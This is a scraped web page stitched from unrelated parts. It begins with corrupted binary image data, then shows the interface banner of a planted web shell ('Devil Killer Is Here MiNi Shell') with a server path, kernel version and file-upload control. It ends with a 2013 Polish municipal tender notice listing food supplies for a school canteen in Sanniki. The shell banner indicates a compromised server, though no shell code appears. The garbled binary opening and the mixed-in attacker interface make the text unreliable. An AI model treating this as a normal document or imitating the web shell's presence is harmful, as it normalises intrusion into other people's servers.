JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130809/321812-N-2013.html

<p class="kh_header"><b>Sanniki: Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2013/2014.</b><br>
<b>Numer ogłoszenia: 321812 - 2013; data zamieszczenia: 09.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2013/2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2013/2014. 
Zamówienie obejmuje artykuły spożywcze z następujących grup asortymentowych:
1. Mięso, produkty mięsno-wędliniarskie i drób,
2. Mleko i przetwory mleczne,
3. Owoce i przetwory owocowe,
4. Warzywa i przetwory warzywne,
5. Przyprawy, makarony, mąki i kasze,
6. Ryby,
7. Pieczywo. 
Szczegółowy zakres przedmiotu zamówienia określony jest w opisie części zamówienia.
Wszystkie nazwy produktów podane przez Zamawiającego w specyfikacji istotnych warunków zamówienia należy traktować jako standardy jakościowe. Zamawiający dopuszcza możliwość zaoferowania artykułów równoważnych. Jakość artykułów równoważnych nie może być gorsza od jakości produktów określonych nazwą. Artykuł równoważny powinien mieć parametry nie gorsze niż wskazany z nazwy produkt. W przypadku zaoferowania przez Wykonawcę artykułu równoważnego należy podać nazwę artykułu i producenta.
Dostawa artykułów żywnościowych do świetlicy Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach odbywać się będzie w ilościach wcześniej zamówionych przez intendentki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.20.00.00-0, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę: Formularz ofertowy - załącznik nr 1 do SIWZ, Kalkulacja cenowa - załącznik nr 5 do SIWZ. Wykonawca wypełnia formularz ofertowy oraz kalkulację cenową w zakresie oferowanych do wykonania części. Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2), III.4.4 oraz Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 do SIWZ dla każdego wykonawcy z osobna, pozostałe dokumenty mogą być złożone wspólnie. Dokumenty podmiotów zagranicznych. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie w który określa się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów. Formularz ofertowy - załącznik nr1 do SIWZ. 3.2. Kalkulacja cenowa - załącznik nr 5</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy, 2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny, 2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach
ul. Warszawka 169,
09-540 Sanniki, 
pokój nr 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 09:50, miejsce: Urząd Gminy w Sannikach
ul. Warszawka 169, 
09-540 Sanniki, 
pokój nr 10 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa mięsa, produktów mięsno-wędliniarskich i drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu	ilość	jednostka
1. schab z kością	18 kg
2. schab bez kości	25 kg
3. pachwina wędzona	6 kg
4. łopatka bez kości	35 kg
5. żeberka	37 kg
6. wołowina rosołowa	4 kg
7. golonka	2 kg
8. mięso mielone	20 kg
9. mięso na gulasz	20 kg
10. flaki drobiowe	16 kg
11. boczek	6 kg
12. wołowina bez kości	9 kg
13. polędwica sopocka	5 kg
14. kiełbasa podwawelska	13 kg
15. kiełbasa biała surowa	15 kg
16. kiełbasa zwyczajna	2 kg
17. kiełbasa szynkówka	5 kg
18. kiełbasa śląska	3 kg.
19. kaszanka	1 kg
20. Pasztetowa drobiowa Duda lub równoważna	3 kg
21. salceson	2 kg
22. szynka z indyka	13 kg
23. szynka	5 kg
24. pasztet drobiowy (puszka)- 155 g	10 szt.
25. kiełbasa parówkowa	4 kg
26. mortadela 3 kg
27. kurczaki	 65 kg
28. udka	21 kg
29. żołądki	8 kg
30. piersi z kością	 26 kg
31. porcje rosołowe	12 kg
32. skrzydełka	36 kg
33. filet z kurczaka	20 kg
34. wątróbka drobiowa	10 kg
35. pałeczki z kurczaka	46 kg
36. serduszka drobiowe	10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa mleka i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu	ilość	jednostka
1. ser biały - półtłusty	56 kg
2. mleko w folii 2%	91 litry
3. śmietana 30% (0,5l)	107 szt.
4. masło śmietankowe - 200g	79 szt.
5. masło roślinne w kubku - 250g	43 szt.
6. serek Danio lub równoważny - 150g	248 szt.
7. serek Twój smak lub równoważny - 200g	15 szt.
8. ser żółty Gouda lub równoważny	4 kg
9. jogurt (mały)- 120g Danone Gratka lub równoważny	131 szt.
10. jogurt naturalny 390g 	25 szt.
11. jogurt smakowy 150g Jogobella lub równoważny	149 szt.
12. masło ostrołęckie lub równoważne - 200g	60 szt.
13. Lody w kubku Ice Mastry 300ml	50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa owoców i przetworów owocowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu	Ilość	jednostka
1. jabłka	117 kg
2. cytryny	14 kg
3. banany	46 kg
4. dżem brzoskwiniowy 280g z Łowicza lub równoważny	23 szt.
5. dżem truskawkowy 280g z Łowicza lub równoważny	28 szt.
6. dżem wiśniowy  280g Łowicz  lub równoważny	25 szt.
7. powidła śliwkowe 400g	2 szt.
8. kompot wiśniowy	6 litry
9. sok  Paola 440 ml lub równoważny	90 szt.
10. kompot truskawkowy	6 litry
11. mandarynki	20 kg
12. truskawki (produkty sezonowe)	21 kg
13. winogron	3 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa warzyw i przetworów warzywnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ziemniaki	590 kg
2. ziemniaki młode	 97 kg
3. marchew	57 kg
4. pietruszka	22 kg
5. por 	20 kg
6. pieczarki	8 kg
7. pomidory	13 kg
8. ogórki świeże	19 kg
9. groch	7 kg
10. koper	22 pęczki
11. natka pietruszki	25 pęczki
12. cebula	13 kg
13. kapusta pekińska	18 kg
14. kapusta biała	9 kg
15. kapusta młoda w sezonie	16 szt.
16. kapusta kwaszona	34 kg
17. seler	20 kg
18. Fasola szparagowa	3 kg
19. Fasola 	8 kg
20. kalafior świeży	2 kg
21. kalafior mrożony 450 g	8 szt.
22. fasola mrożona 450g	3 szt.
23. sałata	15 szt.
24. koncentrat pomidorowy 30% 190g	40 szt.
25. rzodkiewka	7 pęczki
26. chrzan biały w słoiku 200g	 2 szt.
27. kapusta czerwona	5 kg
28. ogórki kwaszone	11 kg
29. kapusta włoska	3 szt.
30. przecier szczawiowy siekany w słoiku 200 g	19 szt.
31. ogórki konserwowe 900 ml	 23 słoiki
32. buraki ćwikłowe	39 kg
33. kukurydza w puszcze 400 g Kwidzyn lub równoważna	10 szt.
34. brokuły świeże	3 kg
35. szczypiorek	10 pęczki
36. groszek zielony w puszce - 400g Kwidzyn lub równoważny	10 szt.
37. włoszczyzna	10 pęczki
38. papryka surowa	2 kg.
39. czosnek	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa przypraw, makaronów, mąki i kaszy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp.	Nazwa produktu	ilość	jednostka
1. mąka szymanowska lub równoważna typ 480	32 kg
2. mąka pszenna typ 500	11 kg
3. makaron świderki - 400g Vela lub równoważny	32 szt.
4. makaron rosołowy - 400g Vela lub równoważny	51 szt.
5. makaron krajanka - 400g Vela lub równoważny	1 szt.
6. kasza manna  Kupiec lub równoważna	3 kg
7. ryż Kupiec lub równoważny	13 kg
8. ryż w saszetkach 400 g	4 szt.
9. kasza jęczmienna Kupiec 400g lub równoważna	5 kg
10. kasza jęczmienna w saszetkach 400g	1 szt.
11. cukier	107 kg
12. sól	19 kg
13. kwasek cytrynowy 50g	13 szt.
14. liść laurowy 7 g	9 szt.
15. ketchup 900 g	1 szt.
16. ketchup łagodny w tubce Włocławek lub równoważny	9 szt.
17. mąka ziemniaczana Kupiec lub równoważna	3 kg
18. Przyprawa Vegeta lub równoważna - 200g	75 szt.
19. barszcz biały 65 g	49 szt.
20. majeranek 20g	17 szt.
21. papryka słodka mielona 20g	5 szt.
22. pieprz mielony 20g	16 szt.
23. ziele angielskie 20g	3 szt.
24. kostki rosołowe drobiowe 60 g	34 szt.
25. bulion w butelce 200g	11 szt.
26. płatki czekoladowe 500g Nestle (kulki) lub równoważne	5 szt.
27. płatki kukurydziane 500g Cornflkes lub równoważne	6 szt.
28. jajka duże	578 szt.
29. smalec 200 g	30 szt.
30. herbata granulowana 90g Saga lub równoważna	15 szt.
31. herbata granulowana 90g Lipton lub równoważna	1 szt.
32. olej uniwersalny 1 litrowy Kujawski lub równoważny	44 szt.
33. majonez  620 g pomorski Ocetix lub równoważny	12 szt.
34. ocet 0,5 l 10%	2 szt.
35. batony Lion 43g lub równoważne	1 szt.
36. cukier waniliowy 16 g Delekta lub równoważny	23 szt.
37. sos sałatkowy 9g Knorr lub równoważny	14 szt.
38. sos buraczany 200g 	4 szt.
39. żurek 0,5 l	3 szt.
40. cynamon 15g	2 szt.
41. pieprz w ziarnach 20g	3 szt.
42. sos pieczarkowy 34g Winiary lub równoważny	6 szt.
43. sos grzybowy 40g	6 szt.
44. Budyń   64g Delecta lub równoważny	20 szt.
45. kisiel Delecta 58 g  lub równoważny	30 szt.
46. galaretka Delecta 75 g lub równoważna	20 szt.
47. przyprawa do kurczaka 35g	5 szt.
48. herbata ekspresowa (100 torebek) Saga lub równoważna 	6 szt.
49. krem czekoladowy NUTELLA 180g lub równoważny	- 114 szt.
50. kakao granulowane Puchatek lub równoważne - 350g	4 szt.
51. kawa zbożowa INKA 150 g lub równoważna - 4 szt.
52. sos słodko-kwaśny (mały) 350g	- 42 szt.
53. zupa fasolowa 66 g Winiary lub równoważna	 - 20 szt.
54. zupa grochowa Winiary 55 g lub równoważna	20 szt.
55. zupa pieczarkowa 45 g Winiary lub równoważna	20 szt.
56. Batony Grześki w polewie lub równoważne - 28g	243 szt.
57. Batony Grześki bez polewy lub równoważne - 28g	1 szt.
58. Batony 50 g Góralki lub równoważne	219 szt.
59. soczek ze słomką -200 ml	112 szt.
60. musztarda mała 210 g	2 szt.
61. musztarda 280g sarepska w tubce Kamis lub równoważna	1 szt.
62. miód naturalny wielokwiatowy 350g Podravka lub równoważny	3 szt.
63. Czekolada gorzka 100g	1 szt.
